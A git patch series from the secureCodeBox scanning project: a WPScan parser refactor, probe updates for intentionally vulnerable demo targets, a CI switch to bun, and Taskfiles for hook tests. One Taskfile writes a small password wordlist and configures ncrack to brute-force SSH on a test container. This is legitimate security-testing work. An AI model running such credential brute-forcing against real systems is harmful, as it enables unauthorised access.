b/scanners/wpscan/parser/parser.js index 0b2d4de7a8..50716082b3 100644 --- a/scanners/wpscan/parser/parser.js +++ b/scanners/wpscan/parser/parser.js @@ -5,18 +5,23 @@ /** * Convert the WPScan file / json into secureCodeBox Findings */ -async function parse(scanResults) { - if (typeof scanResults === "string") - // empty file +export async function parse(scanResults) { + if (!scanResults) { return []; + } - const wpscanVersion = scanResults.banner.version; - const wpscanRequestsDone = scanResults.requests_done; + const report = JSON.parse(scanResults); + if (!report || !report.target_url) { + return []; + } + + const wpscanVersion = report.banner?.version; + const wpscanRequestsDone = report.requests_done; - const targetUrl = scanResults.target_url; - const targetIp = scanResults.target_ip; + const targetUrl = report.target_url; + const targetIp = report.target_ip; // convert unix timestamp to ISO date string, multiply by 1000 because JS uses milliseconds - const identified_at = new Date(scanResults.stop_time * 1000).toISOString(); + const identified_at = new Date(report.stop_time * 1000).toISOString(); // Add a general INFORMATIONAL summary finding const summaryFinding = { @@ -28,24 +33,24 @@ async function parse(scanResults) { osi_layer: "APPLICATION", severity: "INFORMATIONAL", references: null, - confidence: scanResults.version?.confidence, + confidence: report.version?.confidence, attributes: { hostname: targetUrl, ip_addresses: [targetIp], wpscan_version: wpscanVersion, wpscan_requests: wpscanRequestsDone, - wp_version: scanResults.version?.number, - wp_release_date: scanResults.version?.release_date, - wp_release_status: scanResults.version?.status, - wp_interesting_entries: scanResults.version?.interesting_entries, - wp_found_by: scanResults.version?.found_by, - wp_confirmed_by: scanResults.version?.confirmed_by, - wp_vulnerabilities: scanResults.version?.vulnerabilities, + wp_version: report.version?.number, + wp_release_date: report.version?.release_date, + wp_release_status: report.version?.status, + wp_interesting_entries: report.version?.interesting_entries, + wp_found_by: report.version?.found_by, + wp_confirmed_by: report.version?.confirmed_by, + wp_vulnerabilities: report.version?.vulnerabilities, }, }; // Add all interesting findings as INFORMATIONAL - const interestingFindings = scanResults.interesting_findings.map( + const interestingFindings = report.interesting_findings.map( (interestingFinding) => { // Create a flattened array of references with their types const references = Object.entries(interestingFinding.references).flatMap( @@ -77,7 +82,7 @@ async function parse(scanResults) { ); // Add plugin vulnerabilities as HIGH - const pluginVulnerabilities = Object.values(scanResults.plugins).flatMap( + const pluginVulnerabilities = Object.values(report.plugins).flatMap( (plugin) => plugin.vulnerabilities.map((vulnerability) => { // Create a flattened array of references with their types @@ -111,4 +116,3 @@ async function parse(scanResults) { // Combine all findings and return return [summaryFinding, ...interestingFindings, ...pluginVulnerabilities]; } -module.exports.parse = parse; diff --git a/scanners/wpscan/parser/parser.test.js b/scanners/wpscan/parser/parser.test.js index 0c71ad9967..068de0aff8 100644 --- a/scanners/wpscan/parser/parser.test.js +++ b/scanners/wpscan/parser/parser.test.js @@ -2,18 +2,17 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "node:fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const { parse } = require("./parser"); +import { parse } from "./parser"; test("WPScan parser parses a successfully scan result with at least one informational finding", async () => { - const scanResults = JSON.parse( - await readFile(__dirname + "/__testFiles__/example-latest.json", { + const scanResults = await readFile( + __dirname + "/__testFiles__/example-latest.json", + { encoding: "utf8", - }), + }, ); const findings = await parse(scanResults); @@ -188,10 +187,11 @@ test("WPScan parser parses a successfully scan result with at least one informat }); test("WPScan parser parses a scan result file without a detected wp version correctly", async () => { - const scanResults = JSON.parse( - await readFile(__dirname + "/__testFiles__/no-version-detected.json", { + const scanResults = await readFile( + __dirname + "/__testFiles__/no-version-detected.json", + { encoding: "utf8", - }), + }, ); const findings = await parse(scanResults); From ed5b70c8c1aa42626feff5516f4ad16ecb75b9aa Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 16:55:29 +0200 Subject: [PATCH 079/137] Ensure that the semgrep predeploy step can be run multiple times --- scanners/semgrep/Taskfile.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scanners/semgrep/Taskfile.yaml b/scanners/semgrep/Taskfile.yaml index ab2a109d37..b267fed1d2 100644 --- a/scanners/semgrep/Taskfile.yaml +++ b/scanners/semgrep/Taskfile.yaml @@ -12,4 +12,4 @@ includes: tasks: predeploy: cmds: - - kubectl -n integration-tests create configmap semgrep-test-file --from-file=integration-tests/testfile.py + - kubectl -n integration-tests create configmap semgrep-test-file --from-file=integration-tests/testfile.py --dry-run=client -o yaml | kubectl apply -f - From dceb7c496a96cc6b7eda36395126a48c89852653 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 16:59:11 +0200 Subject: [PATCH 080/137] Update snapshots to include changes to startup probe --- .../tests/__snapshot__/bodgeit_test.yaml.snap | 10 ++++++++-- .../__snapshot__/dummy-ssh_test.yaml.snap | 6 ++++++ .../__snapshot__/http-webhook_test.yaml.snap | 18 ++++++++++++++++++ .../__snapshot__/juice-shop_test.yaml.snap | 7 +++++++ .../__snapshot__/old-joomla_test.yaml.snap | 7 +++++++ .../__snapshot__/old-typo3_test.yaml.snap | 7 +++++++ .../__snapshot__/old-wordpress_test.yaml.snap | 9 +++++++-- .../swagger-petstore_test.yaml.snap | 9 +++++++-- .../__snapshot__/unsafe-https_test.yaml.snap | 6 ++++++ .../vulnerable-log4j_test.yaml.snap | 15 +++++++++++++++ 10 files changed, 88 insertions(+), 6 deletions(-) diff --git a/demo-targets/bodgeit/tests/__snapshot__/bodgeit_test.yaml.snap b/demo-targets/bodgeit/tests/__snapshot__/bodgeit_test.yaml.snap index d71b8c7f9c..3835ba9ab9 100644 --- a/demo-targets/bodgeit/tests/__snapshot__/bodgeit_test.yaml.snap +++ b/demo-targets/bodgeit/tests/__snapshot__/bodgeit_test.yaml.snap @@ -47,7 +47,6 @@ matches the snapshot: httpGet: path: / port: http - initialDelaySeconds: 60 name: bodgeit ports: - containerPort: 8080 @@ -58,7 +57,6 @@ matches the snapshot: httpGet: path: / port: http - initialDelaySeconds: 60 periodSeconds: 10 successThreshold: 1 timeoutSeconds: 60 @@ -73,6 +71,14 @@ matches the snapshot: readOnlyRootFilesystem: true runAsNonRoot: true runAsUser: 1234 + startupProbe: + failureThreshold: 30 + httpGet: + path: / + port: http + periodSeconds: 3 + successThreshold: 1 + timeoutSeconds: 5 imagePullSecrets: - name: foo nodeSelector: diff --git a/demo-targets/dummy-ssh/tests/__snapshot__/dummy-ssh_test.yaml.snap b/demo-targets/dummy-ssh/tests/__snapshot__/dummy-ssh_test.yaml.snap index 2ac436ccb5..8de190c814 100644 --- a/demo-targets/dummy-ssh/tests/__snapshot__/dummy-ssh_test.yaml.snap +++ b/demo-targets/dummy-ssh/tests/__snapshot__/dummy-ssh_test.yaml.snap @@ -68,6 +68,12 @@ matches the snapshot: readOnlyRootFilesystem: true runAsNonRoot: true runAsUser: 1234 + startupProbe: + failureThreshold: 30 + periodSeconds: 3 + successThreshold: 1 + tcpSocket: + port: 22 nodeSelector: foo: bar securityContext: diff --git a/demo-targets/http-webhook/tests/__snapshot__/http-webhook_test.yaml.snap b/demo-targets/http-webhook/tests/__snapshot__/http-webhook_test.yaml.snap index ca10197f30..024edcd3d0 100644 --- a/demo-targets/http-webhook/tests/__snapshot__/http-webhook_test.yaml.snap +++ b/demo-targets/http-webhook/tests/__snapshot__/http-webhook_test.yaml.snap @@ -42,11 +42,22 @@ matches the snapshot: containers: - image: docker.io/mendhak/http-https-echo:latest imagePullPolicy: IfNotPresent + livenessProbe: + httpGet: + path: / + port: http name: http-webhook ports: - containerPort: 8080 name: http protocol: TCP + readinessProbe: + failureThreshold: 3 + httpGet: + path: / + port: http + periodSeconds: 10 + successThreshold: 1 resources: requests: cpu: 123m @@ -58,6 +69,13 @@ matches the snapshot: readOnlyRootFilesystem: true runAsNonRoot: true runAsUser: 1234 + startupProbe: + failureThreshold: 30 + httpGet: + path: / + port: http + periodSeconds: 3 + successThreshold: 1 nodeSelector: foo: bar securityContext: diff --git a/demo-targets/juice-shop/tests/__snapshot__/juice-shop_test.yaml.snap b/demo-targets/juice-shop/tests/__snapshot__/juice-shop_test.yaml.snap index ef324c844e..fd100f1438 100644 --- a/demo-targets/juice-shop/tests/__snapshot__/juice-shop_test.yaml.snap +++ b/demo-targets/juice-shop/tests/__snapshot__/juice-shop_test.yaml.snap @@ -95,6 +95,13 @@ matches the snapshot: readOnlyRootFilesystem: true runAsNonRoot: true runAsUser: 1234 + startupProbe: + failureThreshold: 30 + httpGet: + path: / + port: http + periodSeconds: 3 + successThreshold: 1 volumeMounts: - mountPath: /juice-shop/config name: custom-config diff --git a/demo-targets/old-joomla/tests/__snapshot__/old-joomla_test.yaml.snap b/demo-targets/old-joomla/tests/__snapshot__/old-joomla_test.yaml.snap index 32fc0710c1..a683a28857 100644 --- a/demo-targets/old-joomla/tests/__snapshot__/old-joomla_test.yaml.snap +++ b/demo-targets/old-joomla/tests/__snapshot__/old-joomla_test.yaml.snap @@ -62,6 +62,13 @@ matches the snapshot: readOnlyRootFilesystem: true runAsNonRoot: true runAsUser: 1234 + startupProbe: + failureThreshold: 30 + httpGet: + path: / + port: http + periodSeconds: 3 + successThreshold: 1 nodeSelector: foo: bar securityContext: diff --git a/demo-targets/old-typo3/tests/__snapshot__/old-typo3_test.yaml.snap b/demo-targets/old-typo3/tests/__snapshot__/old-typo3_test.yaml.snap index 45307caa5a..1afbb74652 100644 --- a/demo-targets/old-typo3/tests/__snapshot__/old-typo3_test.yaml.snap +++ b/demo-targets/old-typo3/tests/__snapshot__/old-typo3_test.yaml.snap @@ -62,6 +62,13 @@ matches the snapshot: readOnlyRootFilesystem: true runAsNonRoot: true runAsUser: 1234 + startupProbe: + failureThreshold: 30 + httpGet: + path: / + port: http + periodSeconds: 3 + successThreshold: 1 nodeSelector: foo: bar securityContext: diff --git a/demo-targets/old-wordpress/tests/__snapshot__/old-wordpress_test.yaml.snap b/demo-targets/old-wordpress/tests/__snapshot__/old-wordpress_test.yaml.snap index 5c94d43751..40ce2b37bd 100644 --- a/demo-targets/old-wordpress/tests/__snapshot__/old-wordpress_test.yaml.snap +++ b/demo-targets/old-wordpress/tests/__snapshot__/old-wordpress_test.yaml.snap @@ -50,7 +50,6 @@ matches the snapshot: httpGet: path: / port: http - initialDelaySeconds: 60 name: old-wordpress ports: - containerPort: 80 @@ -61,7 +60,6 @@ matches the snapshot: httpGet: path: / port: http - initialDelaySeconds: 60 periodSeconds: 10 successThreshold: 1 timeoutSeconds: 60 @@ -76,6 +74,13 @@ matches the snapshot: readOnlyRootFilesystem: true runAsNonRoot: true runAsUser: 1234 + startupProbe: + failureThreshold: 30 + httpGet: + path: / + port: http + periodSeconds: 3 + successThreshold: 1 nodeSelector: foo: bar securityContext: diff --git a/demo-targets/swagger-petstore/tests/__snapshot__/swagger-petstore_test.yaml.snap b/demo-targets/swagger-petstore/tests/__snapshot__/swagger-petstore_test.yaml.snap index 9598368643..2208317b3e 100644 --- a/demo-targets/swagger-petstore/tests/__snapshot__/swagger-petstore_test.yaml.snap +++ b/demo-targets/swagger-petstore/tests/__snapshot__/swagger-petstore_test.yaml.snap @@ -54,7 +54,6 @@ matches the snapshot: httpGet: path: / port: http - initialDelaySeconds: 60 name: swagger-petstore ports: - containerPort: 8080 @@ -65,7 +64,6 @@ matches the snapshot: httpGet: path: / port: http - initialDelaySeconds: 60 periodSeconds: 10 successThreshold: 1 timeoutSeconds: 60 @@ -80,6 +78,13 @@ matches the snapshot: readOnlyRootFilesystem: true runAsNonRoot: true runAsUser: 1234 + startupProbe: + failureThreshold: 30 + httpGet: + path: / + port: http + periodSeconds: 3 + successThreshold: 1 nodeSelector: foo: bar securityContext: diff --git a/demo-targets/unsafe-https/tests/__snapshot__/unsafe-https_test.yaml.snap b/demo-targets/unsafe-https/tests/__snapshot__/unsafe-https_test.yaml.snap index 35987f2ddf..979ea466bd 100644 --- a/demo-targets/unsafe-https/tests/__snapshot__/unsafe-https_test.yaml.snap +++ b/demo-targets/unsafe-https/tests/__snapshot__/unsafe-https_test.yaml.snap @@ -68,6 +68,12 @@ matches the snapshot: readOnlyRootFilesystem: true runAsNonRoot: true runAsUser: 1234 + startupProbe: + failureThreshold: 30 + periodSeconds: 3 + successThreshold: 1 + tcpSocket: + port: 443 nodeSelector: foo: bar securityContext: diff --git a/demo-targets/vulnerable-log4j/tests/__snapshot__/vulnerable-log4j_test.yaml.snap b/demo-targets/vulnerable-log4j/tests/__snapshot__/vulnerable-log4j_test.yaml.snap index 50773fc070..754289a782 100644 --- a/demo-targets/vulnerable-log4j/tests/__snapshot__/vulnerable-log4j_test.yaml.snap +++ b/demo-targets/vulnerable-log4j/tests/__snapshot__/vulnerable-log4j_test.yaml.snap @@ -46,11 +46,19 @@ matches the snapshot: containers: - image: ghcr.io/christophetd/log4shell-vulnerable-app:0.0.0 imagePullPolicy: IfNotPresent + livenessProbe: + httpGet: + path: / + port: http name: vulnerable-log4j ports: - containerPort: 8080 name: http protocol: TCP + readinessProbe: + httpGet: + path: / + port: http resources: requests: cpu: 123m @@ -62,6 +70,13 @@ matches the snapshot: readOnlyRootFilesystem: true runAsNonRoot: true runAsUser: 1234 + startupProbe: + failureThreshold: 30 + httpGet: + path: / + port: http + periodSeconds: 3 + successThreshold: 1 nodeSelector: foo: bar securityContext: From 946da1744972589534bdc8389028f9a9eea30e57 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 17:04:14 +0200 Subject: [PATCH 081/137] Run test helper tests with bun instead of node --- .github/workflows/ci.yaml | 12 +++++------- tests/integration/package.json | 3 +-- 2 files changed, 6 insertions(+), 9 deletions(-) diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index 503a31da50..bd56b66f62 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -31,18 +31,16 @@ jobs: steps: - uses: actions/checkout@v4 - - uses: actions/setup-node@v4 - with: - node-version-file: ".nvmrc" + - name: Install bun + uses: oven-sh/setup-bun@v2 - name: Install dependencies working-directory: tests/integration - run: | - npm ci + run: bun install + - name: Test Node.js Scanner Test Helpers working-directory: tests/integration - run: | - npm run test:helpers + run: bun test helpers.test.js k8s-setup: name: "Setup Kind & Kubectl & Helm" runs-on: ubuntu-22.04 diff --git a/tests/integration/package.json b/tests/integration/package.json index 0236cfd709..8ac5689d6b 100644 --- a/tests/integration/package.json +++ b/tests/integration/package.json @@ -4,9 +4,8 @@ "description": "Integration Tests running on a real k8s cluster", "main": "helpers", "scripts": { - "test:unit": "jest --verbose --testPathIgnorePatterns /integration-tests/ --ci --colors --coverage --passWithNoTests", "test:integration": "jest --verbose --ci --colors --coverage --passWithNoTests", - "test:helpers": "jest helpers.test.js --verbose --ci --colors --coverage --passWithNoTests" + "test:helpers": "bun test helpers.test.js" }, "keywords": [], "author": "iteratec GmbH", From bd6a329d8fb6b82413270f112fbec44c36d725f1 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 18:28:31 +0200 Subject: [PATCH 082/137] Remove unneeded conditions as these steps are already ensure by task deps --- scanners/Taskfile.yaml | 13 ------------- 1 file changed, 13 deletions(-) diff --git a/scanners/Taskfile.yaml b/scanners/Taskfile.yaml index bf19bfccc1..2984593695 100644 --- a/scanners/Taskfile.yaml +++ b/scanners/Taskfile.yaml @@ -112,13 +112,6 @@ tasks: desc: Run unit tests for the {{ .scannerName }} scanner deps: - test:setup - preconditions: - - msg: "parser-sdk dependencies are not installed, run 'task test:setup' first" - sh: "[ -d {{ .ROOT_DIR }}/../../parser-sdk/nodejs/node_modules ]" - - msg: "integration-tests dependencies are not installed, run 'task test:setup' first" - sh: "[ -d {{ .ROOT_DIR }}/../../tests/integration/node_modules ]" - - msg: "scanner dependencies are not installed, run 'task test:setup' first" - sh: "[ -d {{ .ROOT_DIR }}/../node_modules ]" cmds: - | echo "Running integration tests for {{ .scannerName }}" @@ -129,12 +122,6 @@ tasks: - test:setup - deploy preconditions: - - msg: "parser-sdk dependencies are not installed, run 'task test:setup' first" - sh: "[ -d {{ .ROOT_DIR }}/../../parser-sdk/nodejs/node_modules ]" - - msg: "integration-tests dependencies are not installed, run 'task test:setup' first" - sh: "[ -d {{ .ROOT_DIR }}/../../tests/integration/node_modules ]" - - msg: "scanner dependencies are not installed, run 'task test:setup' first" - sh: "[ -d {{ .ROOT_DIR }}/../node_modules ]" - msg: "kind cluster is not running, run 'task prepare-testing-env' from project root dir first" sh: "kubectl config get-contexts | grep -q 'kind-testing-env' || false" - msg: "secureCodeBox operator is not deployed, run 'task prepare-testing-env' from project root dir first" From 7ef2c2744c0affd36c2fb4798fa640a8ca1ee802 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 18:30:14 +0200 Subject: [PATCH 083/137] Start migrating cascading scan hook --- hooks/Taskfile.yaml | 128 + hooks/cascading-scans/.gitignore | 4 + hooks/cascading-scans/Taskfile.yaml | 35 + hooks/cascading-scans/hook/hook.ts | 2 +- hooks/cascading-scans/hook/package-lock.json | 14 + hooks/cascading-scans/hook/package.json | 6 +- hooks/cascading-scans/hook/scope-limiter.ts | 2 +- .../cascade-nmap-ncrack.test.js | 13 +- .../cascade-nmap-sslyze.test.js.disabled | 0 hooks/jest.config.js | 11 - hooks/package-lock.json | 7767 ----------------- hooks/package-lock.json.license | 3 - hooks/package.json | 50 - hooks/package.json.license | 3 - tests/integration/helpers.ts | 4 +- 15 files changed, 192 insertions(+), 7850 deletions(-) create mode 100644 hooks/Taskfile.yaml create mode 100644 hooks/cascading-scans/Taskfile.yaml rename hooks/cascading-scans/{hook => }/integration-tests/cascade-nmap-ncrack.test.js (67%) rename hooks/cascading-scans/{hook => }/integration-tests/cascade-nmap-sslyze.test.js.disabled (100%) delete mode 100644 hooks/jest.config.js delete mode 100644 hooks/package-lock.json delete mode 100644 hooks/package-lock.json.license delete mode 100644 hooks/package.json delete mode 100644 hooks/package.json.license diff --git a/hooks/Taskfile.yaml b/hooks/Taskfile.yaml new file mode 100644 index 0000000000..4507690732 --- /dev/null +++ b/hooks/Taskfile.yaml @@ -0,0 +1,128 @@ +version: "3" + +includes: + demo-targets: + taskfile: ../demo-targets/Taskfile.yaml + internal: true + core: + taskfile: ../Taskfile.yaml + internal: true + +vars: + # addtional cli args to pass to the helm install command which installs the hook into the testing environment + additionalHelmInstallArgsForHook: '{{ .additionalHelmInstallArgsForHook | default "" }}' +env: + IMG_TAG: + sh: 'echo "sha-$(git rev-parse --short HEAD)"' + +tasks: + build: + desc: Build the Docker image for the {{ .hookName }} hook + status: + - docker images | grep -q "docker.io/securecodebox/hook-{{ .hookName }}:${IMG_TAG}" || false + preconditions: + - msg: "Docker is not running, please start Docker first" + sh: "docker info >/dev/null 2>&1 || false" + deps: + - core:build-hook-sdk-image + cmds: + - | + echo "Building custom hook image for {{ .hookName }} with tag ${IMG_TAG}" + docker build -t docker.io/securecodebox/hook-{{ .hookName }}:${IMG_TAG} \ + --build-arg=baseImageTag=${IMG_TAG} \ + {{ .ROOT_DIR }}/hook/ + kind load docker-image --name testing-env docker.io/securecodebox/hook-{{ .hookName }}:${IMG_TAG} + predeploy: + desc: Can be overwritten by the hook to perform any pre-deployment steps + cmds: [] + silent: true + deploy: + desc: Deploy the {{ .hookName }} hook to the testing environment + deps: + - core:prepare-testing-env + - build + status: + - helm ls {{ .hookName }} -n integration-tests | grep -q '{{ .hookName }}' || false + cmds: + - 'echo "Deploying {{ .hookName }} to the testing environment"' + - task: predeploy + - | + helm upgrade --install {{ .hookName }} {{ .ROOT_DIR }} --namespace integration-tests \ + --set="hook.image.tag=${IMG_TAG}" \ + --set="hook.image.pullPolicy=Never" \ + {{ if ne "" .additionalHelmInstallArgsForHook -}} + {{ .additionalHelmInstallArgsForHook -}} + {{ end -}} + --wait + + # test:setup tasks + test:setup:hook-sdk: + internal: true + status: + - "[ -d {{ .ROOT_DIR }}/../../hook-sdk/nodejs/node_modules ] || false" + cmds: + - cd {{ .ROOT_DIR }}/../../hook-sdk/nodejs/ && bun install + test:setup:test-helpers: + internal: true + status: + - "[ -d {{ .ROOT_DIR }}/../../tests/integration/node_modules ] || false" + cmds: + - cd {{ .ROOT_DIR }}/../../tests/integration && bun install + test:setup:hook-deps: + internal: true + status: + - "[ -d {{ .ROOT_DIR }}/hook/node_modules ] || false" + cmds: + - cd {{ .ROOT_DIR }}/hook/ && bun install + test:setup: + cmds: + - task: test:setup:hook-sdk + - task: test:setup:test-helpers + - task: test:setup:hook-deps + + test:unit: + desc: Run unit tests for the {{ .hookName }} hook + deps: + - test:setup + cmds: + - | + echo "Running unit tests for {{ .hookName }}" + bun test {{ .ROOT_DIR }}/hook/ + test:integration: + desc: Run integration tests for the {{ .hookName }} hook + deps: + - test:setup + - deploy + preconditions: + - msg: "kind cluster is not running, run 'task prepare-testing-env' from project root dir first" + sh: "kubectl config get-contexts | grep -q 'kind-testing-env' || false" + - msg: "secureCodeBox operator is not deployed, run 'task prepare-testing-env' from project root dir first" + sh: "kubectl get pods -n securecodebox-system | grep -q 'securecodebox-operator' || false" + - msg: "{{ .hookName }} hook is not deployed, run 'task build deploy' from hook dir first" + sh: "helm -n integration-tests ls | grep -q '{{ .hookName }}' || false" + cmds: + # Workaround for https://github.com/oven-sh/bun/issues/7332 + - 'echo "Forwarding the Kubernetes API to localhost"' + - kubectl proxy >/dev/null 2>&1 & + - sleep 1 # Wait a bit to ensure the proxy is up + + - defer: | + # kill pid with command "kubectl proxy" + echo "Killing kubectl proxy" + pkill -f "kubectl proxy" + + - echo "Running integration tests for {{ .hookName }}" + - bun test {{ .ROOT_DIR }}/integration-tests/ + test:helm: + desc: Run helm tests for the {{ .hookName }} hook + preconditions: + - msg: "Helm unittest plugin is not installed, you need to install it first. See: https://github.com/helm-unittest/helm-unittest/" + sh: "helm plugin list | grep -q 'unittest' || false" + cmds: + - helm unittest {{ .ROOT_DIR }} + test: + desc: Run all tests for the {{ .hookName }} hook + cmds: + - task test:unit + - task test:helm + - task test:integration diff --git a/hooks/cascading-scans/.gitignore b/hooks/cascading-scans/.gitignore index 848754b329..2fd17837f0 100644 --- a/hooks/cascading-scans/.gitignore +++ b/hooks/cascading-scans/.gitignore @@ -7,3 +7,7 @@ node_modules **.js !**.test.js *.tar + +# files generated by the test suite +passwords.txt +users.txt \ No newline at end of file diff --git a/hooks/cascading-scans/Taskfile.yaml b/hooks/cascading-scans/Taskfile.yaml new file mode 100644 index 0000000000..a7e3bdac86 --- /dev/null +++ b/hooks/cascading-scans/Taskfile.yaml @@ -0,0 +1,35 @@ +version: "3" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + excludes: + - predeploy + vars: + hookName: cascading-scans + additionalHelmInstallArgsForScanner: | + --set="scanner.image.pullPolicy=IfNotPresent" \ + --set="nucleiTemplateCache.enabled=false" \ + +tasks: + predeploy: + deps: + - demo-targets:deploy:dummy-ssh + cmds: + - | + # install nmap + helm -n integration-tests upgrade --install nmap oci://ghcr.io/securecodebox/helm/nmap \ + --set="cascadingRules.enabled=true" + - | + # install ncrack + printf "root\nadmin\n" > users.txt + printf "THEPASSWORDYOUCREATED\n123456\npassword\n" > passwords.txt + kubectl create secret generic --from-file users.txt --from-file passwords.txt ncrack-lists -n integration-tests --dry-run=client -o yaml | kubectl apply -f - + + helm -n integration-tests upgrade --install ncrack oci://ghcr.io/securecodebox/helm/ncrack \ + --set="scanner.extraVolumes[0].name=ncrack-lists" \ + --set="scanner.extraVolumes[0].secret.secretName=ncrack-lists" \ + --set="scanner.extraVolumeMounts[0].name=ncrack-lists" \ + --set="scanner.extraVolumeMounts[0].mountPath=/ncrack/" \ + --set="cascadingRules.enabled=true" diff --git a/hooks/cascading-scans/hook/hook.ts b/hooks/cascading-scans/hook/hook.ts index 4779bbd75b..18baf88512 100644 --- a/hooks/cascading-scans/hook/hook.ts +++ b/hooks/cascading-scans/hook/hook.ts @@ -13,7 +13,7 @@ import { isArray, } from "lodash"; import {isMatch as wildcardIsMatch} from "matcher"; -import * as Mustache from "mustache"; +import Mustache from "mustache"; import { startSubsequentSecureCodeBoxScan, diff --git a/hooks/cascading-scans/hook/package-lock.json b/hooks/cascading-scans/hook/package-lock.json index 6e03dc9635..60129fc535 100644 --- a/hooks/cascading-scans/hook/package-lock.json +++ b/hooks/cascading-scans/hook/package-lock.json @@ -20,6 +20,7 @@ "@types/ip-address": "^7.0.0", "@types/jest": "^29.4.0", "@types/lodash": "^4.14.171", + "@types/mustache": "^4.2.6", "@types/node": "^16.0.0", "jest": "^29.3.1", "ts-jest": "^29.0.5", @@ -1230,6 +1231,13 @@ "integrity": "sha512-Hwx9EUgdwf2GLarOjQp5ZH8ZmblzcbTBC2wtQWNKARBSxM9ezRIAUpeDTgoQRAFB0+8CNWXVA9+MaSOzOF3nPg==", "dev": true }, + "node_modules/@types/mustache": { + "version": "4.2.6", + "resolved": "https://registry.npmjs.org/@types/mustache/-/mustache-4.2.6.tgz", + "integrity": "sha512-t+8/QWTAhOFlrF1IVZqKnMRJi84EgkIK5Kh0p2JV4OLywUvCwJPFxbJAl7XAow7DVIHsF+xW9f1MVzg0L6Szjw==", + "dev": true, + "license": "MIT" + }, "node_modules/@types/node": { "version": "16.18.38", "resolved": "https://registry.npmjs.org/@types/node/-/node-16.18.38.tgz", @@ -5540,6 +5548,12 @@ "integrity": "sha512-Hwx9EUgdwf2GLarOjQp5ZH8ZmblzcbTBC2wtQWNKARBSxM9ezRIAUpeDTgoQRAFB0+8CNWXVA9+MaSOzOF3nPg==", "dev": true }, + "@types/mustache": { + "version": "4.2.6", + "resolved": "https://registry.npmjs.org/@types/mustache/-/mustache-4.2.6.tgz", + "integrity": "sha512-t+8/QWTAhOFlrF1IVZqKnMRJi84EgkIK5Kh0p2JV4OLywUvCwJPFxbJAl7XAow7DVIHsF+xW9f1MVzg0L6Szjw==", + "dev": true + }, "@types/node": { "version": "16.18.38", "resolved": "https://registry.npmjs.org/@types/node/-/node-16.18.38.tgz", diff --git a/hooks/cascading-scans/hook/package.json b/hooks/cascading-scans/hook/package.json index da4fd89f03..fc7b5e09da 100644 --- a/hooks/cascading-scans/hook/package.json +++ b/hooks/cascading-scans/hook/package.json @@ -47,11 +47,9 @@ }, "devDependencies": { "@types/ip-address": "^7.0.0", - "@types/jest": "^29.4.0", "@types/lodash": "^4.14.171", + "@types/mustache": "^4.2.6", "@types/node": "^16.0.0", - "jest": "^29.3.1", - "ts-jest": "^29.0.5", "typescript": "^4.3.5" } -} +} \ No newline at end of file diff --git a/hooks/cascading-scans/hook/scope-limiter.ts b/hooks/cascading-scans/hook/scope-limiter.ts index db7bceb52f..7ca5a91c8b 100644 --- a/hooks/cascading-scans/hook/scope-limiter.ts +++ b/hooks/cascading-scans/hook/scope-limiter.ts @@ -4,7 +4,7 @@ import {Finding, ScopeLimiter, ScopeLimiterAliases} from "./scan-helpers"; import {V1ObjectMeta} from "@kubernetes/client-node/dist/gen/model/v1ObjectMeta"; -import * as Mustache from "mustache"; +import Mustache from "mustache"; import {Address4, Address6} from "ip-address"; import {fromUrl, parseDomain, ParseResultType} from "parse-domain"; import {flatten, isEqual, takeRight} from "lodash"; diff --git a/hooks/cascading-scans/hook/integration-tests/cascade-nmap-ncrack.test.js b/hooks/cascading-scans/integration-tests/cascade-nmap-ncrack.test.js similarity index 67% rename from hooks/cascading-scans/hook/integration-tests/cascade-nmap-ncrack.test.js rename to hooks/cascading-scans/integration-tests/cascade-nmap-ncrack.test.js index a7280e2a55..44ead1eadc 100644 --- a/hooks/cascading-scans/hook/integration-tests/cascade-nmap-ncrack.test.js +++ b/hooks/cascading-scans/integration-tests/cascade-nmap-ncrack.test.js @@ -2,18 +2,15 @@ // // SPDX-License-Identifier: Apache-2.0 -const {cascadingScan} = require("../../../../tests/integration/helpers"); -var {jest} = require("@jest/globals"); - -jest.retryTimes(3); +import { cascadingScan } from "../../../tests/integration/helpers"; test( "Cascading Scan nmap -> ncrack on dummy-ssh", async () => { - const {categories, severities, count} = await cascadingScan( + const { categories, severities, count } = await cascadingScan( "nmap-dummy-ssh", "nmap", - ["-Pn", "-sV", "dummy-ssh.demo-targets.svc"], + ["-Pn", "-p22", "-sV", "dummy-ssh.demo-targets.svc"], { nameCascade: "ncrack-ssh", matchLabels: { @@ -21,7 +18,7 @@ test( "securecodebox.io/intensive": "high", }, }, - 120 + 120, ); expect(count).toBe(1); @@ -32,5 +29,5 @@ test( high: 1, }); }, - 3 * 60 * 1000 + { timeout: 3 * 60 * 1000 }, ); diff --git a/hooks/cascading-scans/hook/integration-tests/cascade-nmap-sslyze.test.js.disabled b/hooks/cascading-scans/integration-tests/cascade-nmap-sslyze.test.js.disabled similarity index 100% rename from hooks/cascading-scans/hook/integration-tests/cascade-nmap-sslyze.test.js.disabled rename to hooks/cascading-scans/integration-tests/cascade-nmap-sslyze.test.js.disabled diff --git a/hooks/jest.config.js b/hooks/jest.config.js deleted file mode 100644 index f66b8210cc..0000000000 --- a/hooks/jest.config.js +++ /dev/null @@ -1,11 +0,0 @@ -// SPDX-FileCopyrightText: the secureCodeBox authors -// -// SPDX-License-Identifier: Apache-2.0 - -module.exports = { - preset: 'ts-jest', - testEnvironment: 'node', - moduleNameMapper: { - "^@/(.*)$": "/$1" - } -} diff --git a/hooks/package-lock.json b/hooks/package-lock.json deleted file mode 100644 index 44fd2439ca..0000000000 --- a/hooks/package-lock.json +++ /dev/null @@ -1,7767 +0,0 @@ -{ - "name": "@securecodebox/hooks", - "version": "1.0.0", - "lockfileVersion": 2, - "requires": true, - "packages": { - "": { - "name": 